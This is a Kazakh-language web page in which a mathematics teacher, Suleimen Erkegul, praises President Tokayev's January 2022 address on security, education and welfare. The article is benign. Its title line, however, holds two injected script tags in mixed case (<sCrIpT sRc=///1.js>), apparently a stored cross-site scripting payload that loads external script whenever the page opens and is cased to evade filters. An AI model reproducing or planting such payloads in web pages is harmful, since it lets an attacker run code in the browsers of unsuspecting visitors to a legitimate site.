Президент Қасым-Жомарт Кемелұлы Тоқаевтың сөйлеген сөзі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.01.2022

   Президентіміз  Қасым-Жомарт Кемелұлы Тоқаевтың  бір сағаттық мәлімдемесін тыңдай отырып, ризашылығымды білдіргім келеді. Мемлекетіміздегі барлық болып жатқан жағдайларға назар аударып, халықтың  мазалаған басты мәселелерге тоқталып халыққа тиімді бірқатар жаңа өзгерістер еңгізілді. Президентіміз еліміздің қауіпсіздігіне баса назар аударылып, жаңа құрылған үкімет мүшелеріне ел кауіпсіздігі мен тәртіпті басты назарда ұстау керектігін нақты айтты. Сонымен қатар білім саласына да қатысты мәселелер көтерді. Өңірлерде  мұғалімдер саны  жеткіліксіз болғандықтан жаңа  бағдарламалар құрастыруды тапсырды. «Біз мектептерді материалдық тұрғыдан жасақтап жатқанымызбен,  мықты мұғалімдерсіз мектепті көтеру мүмкін емес» деп баса айтты. Техникалық мамандықтарға басымдық беріледі.  5 жаңа жоғарғы оқу орны ашылады, оның екеуі  батыс аймақта делінді. Келесі жақсы жаңалықтардың бірі 2 айдың ішінде Халықтың тұрмысын жақсартуға арналған бағдарламаны дайындауға Үкіметке тапсырма берілді. Жастарға көптеген жаңа жұмыс орындары ашылмақ.

Қиын күндеріміз артта қалып, халқымыздың әл-ауқаты жақсарады деген сенімдемін! Біз ұстаздар қауымы  Президент Қасым Жомарт Кемелұлымен біргеміз!

Сулеймэн Еркегуль, математика пәнінің мұғалімі

Просмотров: 643

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу